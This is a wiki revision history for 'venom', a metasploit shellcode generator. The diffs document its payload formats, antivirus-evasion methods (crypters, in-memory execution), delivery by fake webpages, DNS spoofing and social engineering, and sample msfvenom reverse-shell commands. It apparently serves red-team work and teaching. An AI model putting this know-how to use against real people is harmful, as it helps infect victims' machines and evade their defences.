Recent changes to Home

Home modified by pedro ubuntu

pedro ubuntu — Mon, 19 Sep 2016 23:44:44 -0000

--- v58
+++ v59
@@ -2,7 +2,7 @@
 # ***venom - shellcode generator 1.0.12***
 [[embed url=https://www.youtube.com/watch?v=mNODogKdo2g]]
 .
-[more video tutorials:](https://sourceforge.net/p/crisp-shellcode-generator/wiki/video%20tutorials/ "video tutorials") | [venom changelog:](http://sourceforge.net/p/crisp-shellcode-generator/shell/ci/master/tree/bin/_readme_changelog "venom current changelog") | [git repository Install:](https://sourceforge.net/p/crisp-shellcode-generator/discussion/general/thread/c31986f7/ "git repository Install instructions")
+[more video tutorials:](https://sourceforge.net/p/crisp-shellcode-generator/wiki/video%20tutorials/ "video tutorials") | [venom changelog:](http://sourceforge.net/p/crisp-shellcode-generator/shell/ci/master/tree/bin/_readme_changelog "venom current changelog") | [git repository Install:](https://sourceforge.net/p/crisp-shellcode-generator/discussion/general/thread/c31986f7/ "git repository Install instructions") | [fix kali mingw32 install](https://sourceforge.net/p/crisp-shellcode-generator/discussion/general/thread/e05bc593/ "fix kali 2.0 (rolling) mingw32 repository install")
 
 .
 .

Home modified by pedro ubuntu

pedro ubuntu — Fri, 26 Aug 2016 23:23:21 -0000

--- v57
+++ v58
@@ -1,5 +1,5 @@
 

-# ***venom - shellcode generator 1.0.11***
+# ***venom - shellcode generator 1.0.12***
 [[embed url=https://www.youtube.com/watch?v=mNODogKdo2g]]
 .
 [more video tutorials:](https://sourceforge.net/p/crisp-shellcode-generator/wiki/video%20tutorials/ "video tutorials") | [venom changelog:](http://sourceforge.net/p/crisp-shellcode-generator/shell/ci/master/tree/bin/_readme_changelog "venom current changelog") | [git repository Install:](https://sourceforge.net/p/crisp-shellcode-generator/discussion/general/thread/c31986f7/ "git repository Install instructions")
@@ -16,26 +16,29 @@
   3 | shellcode | windows | DLL | DLL
   4 | shellcode | windows | C | PYTHON/EXE
   5 | shellcode | windows | C | EXE
-  6 | shellcode | windows | C | RUBY  
-  7 | shellcode | windows | MSIEXEC | MSI
-  8 | shellcode | windows | POWERSHELL | BAT(b64)
-  9 | shellcode | windows | HTA-PSH | HTA(b64)
-10 | shellcode | windows | PSH-CMD | PS1(b64)
-11 | shellcode | windows | PSH-CMD | BAT(b64)
-12 | shellcode | windows | VBS | VBS(shikata+ancii)
-13 | shellcode | webserver | PHP | PHP(b64)
-14 | shellcode | multi OS | PYTHON | PYTHON(b64)
-15 | shellcode | multi OS | JAVA | JAR(rce)
-16 | web_delivery | multi OS | PYTHON/PSH | PYTHON/BAT(b64)
-
-
-.
-.
-VENOM 1.0.11 - metasploit Shellcode generator/compiler/listener
+  6 | shellcode | windows | PSH-CMD | EXE
+  7 | shellcode | windows | C | RUBY  
+  8 | shellcode | windows | MSIEXEC | MSI
+  9 | shellcode | windows | POWERSHELL | BAT(b64)
+10 | shellcode | windows | HTA-PSH | HTA(b64)
+11 | shellcode | windows | PSH-CMD | PS1(b64)
+12 | shellcode | windows | PSH-CMD | BAT(b64)
+13 | shellcode | windows | VBS | VBS(shikata+ancii)
+14 | shellcode | windows | PSH-CMD | VBS
+15 | shellcode | windows | PSH-CMD/C | PDF
+16 | shellcode | webserver | PHP | PHP(b64)
+17 | shellcode | multi OS | PYTHON | PYTHON(b64)
+18 | shellcode | multi OS | JAVA | JAR(rce)
+19 | web_delivery | multi OS | PYTHON/PSH | PYTHON/BAT(b64)
+20 | shellcode | android | DALVIK | APK
+
+.
+.
+VENOM 1.0.12 - metasploit Shellcode generator/compiler/listener
 Author: peterubuntu10@sourceforge.net  [ r00t-3xp10it ]
 Suspicious-Shell-Activity (SSA) RedTeam develop @2016
 HomePage: http://sourceforge.net/u/peterubuntu10/profile/
-Codename: malicious_server [ GPL licensed ]
+Codename: black mamba [ GPL licensed ]
 .
 .
 .

Home modified by pedro ubuntu

pedro ubuntu — Fri, 25 Mar 2016 02:37:56 -0000

--- v56
+++ v57
@@ -236,7 +236,7 @@
 ---
 HD Moore (metasploit father) | Nick Harbour (PEScrambler.exe)
 @harmj0y (pyherion) | @G0tmi1k @chris truncker @harmj0y (ruby_stager)
-ReL1K (pyinstaller) | astr0baby (reflective fud dll injection method)
+David Cortesi (pyinstaller) | astr0baby (reflective fud dll injection method)
 0entropy (powershell poc's) | Matthew Graeber (powershell poc's)
 alor&naga (ettercap) | Liviu (encrypt_polarSSL) | Chaitanya (debugging)
 Suriya Prakash (debugging/recording tutorials)| and offcourse me (r00t-3xp10it) ^_^

Home modified by pedro ubuntu

pedro ubuntu — Fri, 25 Mar 2016 02:35:56 -0000

--- v55
+++ v56
@@ -2,7 +2,7 @@
 # ***venom - shellcode generator 1.0.11***
 [[embed url=https://www.youtube.com/watch?v=mNODogKdo2g]]
 .
-[more video tutorials:](https://sourceforge.net/p/crisp-shellcode-generator/wiki/video%20tutorials/ "video tutorials") | [venom changelog:](http://sourceforge.net/p/crisp-shellcode-generator/shell/ci/master/tree/bin/_readme_changelog "venom changelog") | [git repository Install:](https://sourceforge.net/p/crisp-shellcode-generator/discussion/general/thread/c31986f7/")
+[more video tutorials:](https://sourceforge.net/p/crisp-shellcode-generator/wiki/video%20tutorials/ "video tutorials") | [venom changelog:](http://sourceforge.net/p/crisp-shellcode-generator/shell/ci/master/tree/bin/_readme_changelog "venom current changelog") | [git repository Install:](https://sourceforge.net/p/crisp-shellcode-generator/discussion/general/thread/c31986f7/ "git repository Install instructions")
 
 .
 .

Home modified by pedro ubuntu

pedro ubuntu — Fri, 25 Mar 2016 02:34:10 -0000

--- v54
+++ v55
@@ -2,7 +2,7 @@
 # ***venom - shellcode generator 1.0.11***
 [[embed url=https://www.youtube.com/watch?v=mNODogKdo2g]]
 .
-[more video tutorials:](https://sourceforge.net/p/crisp-shellcode-generator/wiki/video%20tutorials/ "video tutorials") | [venom changelog:](http://sourceforge.net/p/crisp-shellcode-generator/shell/ci/master/tree/bin/_readme_changelog "venom changelog")
+[more video tutorials:](https://sourceforge.net/p/crisp-shellcode-generator/wiki/video%20tutorials/ "video tutorials") | [venom changelog:](http://sourceforge.net/p/crisp-shellcode-generator/shell/ci/master/tree/bin/_readme_changelog "venom changelog") | [git repository Install:](https://sourceforge.net/p/crisp-shellcode-generator/discussion/general/thread/c31986f7/")
 
 .
 .

Home modified by pedro ubuntu

pedro ubuntu — Sat, 19 Mar 2016 22:18:23 -0000

--- v53
+++ v54
@@ -96,7 +96,7 @@
 .
 2º - use shell/aux/setup.sh to delete venom domain name
 attack vector and force venom.sh main tool to use default
-settings (http://<your ip="" adrr="">) to deliver payloads using
+settings (http://<your-ip-adrr>) to deliver payloads using
 'social engeneering' technic (send malicious URL to target)
 .
 .

Home modified by pedro ubuntu

pedro ubuntu — Sat, 19 Mar 2016 22:16:49 -0000

--- v52
+++ v53
@@ -135,7 +135,7 @@
 sourcecode and also the ability to execute the 2º stage of shell
 or meterpreter stager directly into targets ram (not touching disk)
 Another example is maligno tool that deliver payloads under https
-(SSL/TSL encrypted comunications) evading better AV detections.
+(SSL/TLS encrypted comunications) evading better AV detections.
 'There are more technics, but they are not reproduced by venom'

 .

Home modified by pedro ubuntu

pedro ubuntu — Sat, 19 Mar 2016 22:14:26 -0000

--- v51
+++ v52
@@ -86,7 +86,7 @@
 venom 1.0.11 (malicious_server) was build to take advantage of
 apache2 webserver to deliver payloads (lan) using a fake webpage
 writen in html that takes advantage of <iframe> <meta-http-equiv>
-or  tags to be hable to trigger payload download. Venom also
+or  tags to be hable to trigger payload download. Venom also
 gives you the ability to deliver your payloads in 2 diferent ways:
 .
 1º - run shell/aux/setup.sh to config venom domain name

Home modified by pedro ubuntu

pedro ubuntu — Sat, 19 Mar 2016 22:12:42 -0000

--- v50
+++ v51
@@ -31,54 +31,118 @@

 .
 .
-VENOM 1.0.11 - metasploit Shellcode generator/compiler/listenner
+VENOM 1.0.11 - metasploit Shellcode generator/compiler/listener
 Author: peterubuntu10@sourceforge.net  [ r00t-3xp10it ]
+Suspicious-Shell-Activity (SSA) RedTeam develop @2016
 HomePage: http://sourceforge.net/u/peterubuntu10/profile/
-Suspicious-Shell-Activity (SSA) RedTeam develop @2016
-.
-.
-.
-
-**[ THE REAZON WHY ]**
-The main goal of this tool its not to build 'FUD' payloads!... But to give to
-its users the first glance of how shellcode is build, embedded into one template
-(any language), obfuscated/crypted (e.g pyherion.py) and compiled into one
-executable file format.
-.
-the goal of this project its to show how the shellcode works, and also to show that
-tools like veil-evasion, powersploit, unicorn uses msfvenom to build shellcode,
-i've tried to show all stages from the construction of shellcode, hoping to explain
-how things were made by others and what techniques they have used, and to show
-that many of these projects are truely communitary (automated) projects ...
-.
-.
-.
+Codename: malicious_server [ GPL licensed ]
+.
+.
+.
+
 **[ DEPENDENCIES ]**
-Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe)
-mingw32 (compile .EXE executables) | pyherion.py (crypter)
-PEScrambler.exe (PE obfuscator/scrambler) | apache2 | wine/winrar
-vbs-obfuscator | encrypt_PolarSSL | ettercap (dns_spoof)
+Zenity | Metasploit | GCC (compiler) | Pyinstaller (compiler)
+mingw32 (compiler) | pyherion.py (crypter) | wine (emulator)
+PEScrambler.exe (PE obfuscator) | apache2 (webserver)| winrar
+vbs-obfuscator (crypter) | encrypt_PolarSSL (crypter) and
+ettercap MitM+DNS_Spoof (venom domain name attack vector)
+
+Venom.sh will download/install all dependencies as they are needed
+Adicionally as build shell/aux/setup.sh to help you install all venom
+tool dependencies (metasploit as to be manually installed)
 .
 .
 **[ HOW DOES VENOM.SH WORKS ? ]**
-The script will use msfvenom (metasploit) to generate shellcode
-in diferent formats ( c | python | ruby | dll | msi | hta-psh )
-injects the shellcode generated into one template (example: python)
-"the python funtion will execute the shellcode in ram" and uses
-compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller
-to build the executable file and  also starts a multi-handler to
-recive the remote connection (reverse shell or meterpreter session).
-.
-'shellcode generator' tool reproduces some of the technics used
-by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..
+This script will use msfvenom (metasploit) to generate shellcode in 
+diferent formats ( c | python | ruby | dll | msi | hta | psh | vbs | php | java)
+then injects the shellcode generated into one template previous writen
+by me (example: python) "the python funtion will execute the shellcode
+into RAM" also uses compilers like gcc (gnu cross compiler) or mingw32
+or pyinstaller to build the stand-alone executable file, it also starts a
+multi-handler to recive the remote connection (shell or meterpreter)
+.
+'venom generator' tool reproduces some of the technics used
+by Veil-Evasion.py, unicorn.py, powersploit.py, etc, etc, etc..
 "P.S. some payloads are undetectable by AV soluctions... yes!!!"
-one of the reasons for that its the use of a funtion to execute
-the 2º stage of shell/meterpreter directly into targets ram.
+One of the reasons for that its the use of a funtion to execute
+the 2º stage of shell/meterpreter directly into targets ram
+the other reazon its the use of external obfuscators/crypters.
+.
+But venom its not a fork of any of this tools because its writen
+using Bash contrary to those tools that uses Python, so i can not
+copy any funtion writen from any of this tools and past it on my
+bash script (obviously), also remmenbering that veil does not
+build: [.msi .hta .vbs .ps1 .dll .php .jar ] payload formats...
+.
+Remmenber also that software like: pycrypto, pyinstaller, pywin
+gcc, mingw32, hiperion, Py2exe, PEScrambler, was not written by
+any of the veil developers, i just did the same that veil porting
+this softwares to my project to be hable to compile obfuscate
+or crypt the shellcode generated by msfvenom...
+.
+.
+
+**[ HOW DO I DELIVER MY PAYLOADS TO TARGET HOST ? ]**
+venom 1.0.11 (malicious_server) was build to take advantage of
+apache2 webserver to deliver payloads (lan) using a fake webpage
+writen in html that takes advantage of <iframe> <meta-http-equiv>
+or  tags to be hable to trigger payload download. Venom also
+gives you the ability to deliver your payloads in 2 diferent ways:
+.
+1º - run shell/aux/setup.sh to config venom domain name
+attack vector (http://mega-upload.com) thats going to use
+ettercap (mitm+dns_spoof method) to redirect target traffic
+to our phishing webpage (IPv<4/6> configuration required)
+.
+2º - use shell/aux/setup.sh to delete venom domain name
+attack vector and force venom.sh main tool to use default
+settings (http://<your ip="" adrr="">) to deliver payloads using
+'social engeneering' technic (send malicious URL to target)
+.
+.
+**[ WHAT ARE THE FILES INSIDE TEMPLATES FOLDER ? ]**
+The shellcode generated can not be executed by its own...
+It requires to be embedded into one template (example: batch)
+to be executed, So the files inside '/shell/templates' are
+templates previous writen by me using diferent languages like
+(C, batch, ruby, powershell, python, php, vbscript) to trigger
+the execution of shellcode directly into targets RAM.
+.
+.
+**[ WHAT ARE THE FILES TRIGGER.BAT FOR ? ]**
+In some modules venom will build the payload and trigger.bat
+to 'trigger' the execution of payload when embedded into one
+winrar/SFX executable file "upon extraction". Venom gives you
+the ability to 'trigger' your payloads in 3 diferent ways:
+.
+1º - paste the command provided by venom into target cmd
+2º - copy bouth files (payload and trigger.bat) to target
+into the same directory and press twice in trigger.bat
+3º - compress bouth files into one WinRar/sfx file
+     send it to target, and press twice to execute it.
+.
+.
+**[ BUILDING SHELLCODE USING MSFVENOM DOES NOT FLAG AV DETECTIONS ? ]**
+Let's take Veil-Evasion python payload (crypted) as example:
+1º - veil uses msfvenom to build shellcode in C format
+2º - then it embedded the shellcode source code into one template
+writen in pyhton language (the funtion will execute shellcode)
+3º - uses 'pyherion.py' to encrypt the source code with one random
+AES key + base64 (all together = FUD) "My 'python/exe -> pyherion'
+module reproduces the same technic, by using the same crypter ;)"
+.
+So it depends of the crypters/obfuscators used to scramble the
+sourcecode and also the ability to execute the 2º stage of shell
+or meterpreter stager directly into targets ram (not touching disk)
+Another example is maligno tool that deliver payloads under https
+(SSL/TSL encrypted comunications) evading better AV detections.
+'There are more technics, but they are not reproduced by venom'
+     
 .
 .
 **[ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE ? ]**
-The default way to generate a windows binarie payload (.exe)
-using msfvenom is achieved through the -f flag (Output format)
+The default way to generate a windows binary payload (.exe)
+using msfvenom is achieved through the -f switch (format) and -o (output name)

     msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

@@ -103,35 +167,6 @@

     Using hex as output format:
     msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex
- 
-.  
-.
-**[ BUILDING SHELLCODE USING MSFVENOM DOES NOT FLAG AV ?]**
-shellcode generator' tool reproduces some of the technics used
-by Veil-Evasion framework, unicorn.py, powersploit, etc, etc, etc..
-"some payloads are undetectable (FUD) to AV soluctions yes !!!"
-Let's take Veil-Evasion python payload (obfuscated) as example:
-[1º] veil uses msfvenom to build shellcode in C language
-[2º] it injects the shellcode source code into one template writen
-      in pyhton language (the funtion will execute the shellcode)
-[3º] and then uses 'pyherion.py' crypter/obfuscater to obfuscate
-      the source code in base64+AES random key (all together = FUD)
-"my 'python/exe -> pyherion' module reproduces the same technic!!"
-.
-.
-**[ WHAT ARE THE FILES TRIGGER.BAT FOR ? ]**
-In some modules venom will build the payload and trigger.bat
-to 'trigger' the execution of payload when embedded into one
-winrarSFX executable file "upon extraction", so we can execute
-our payload in target cmd by issuing one command or we can
-execute our payload by pressing into trigger.bat (user choise)
-.
-.
-**[ WHAT ARE THE FILES INSIDE TEMPLATES FOLDER ? ]**
-The shellcode generated can not be executed by its own
-it requires to be embedded into a template (example: python)
-to be executed in RAM, So the files inside '/shell/templates'
-are templates previous writen to be embedded with shellcode.
 .
 .
 .

Home modified by pedro ubuntu

pedro ubuntu — Sat, 12 Mar 2016 18:20:21 -0000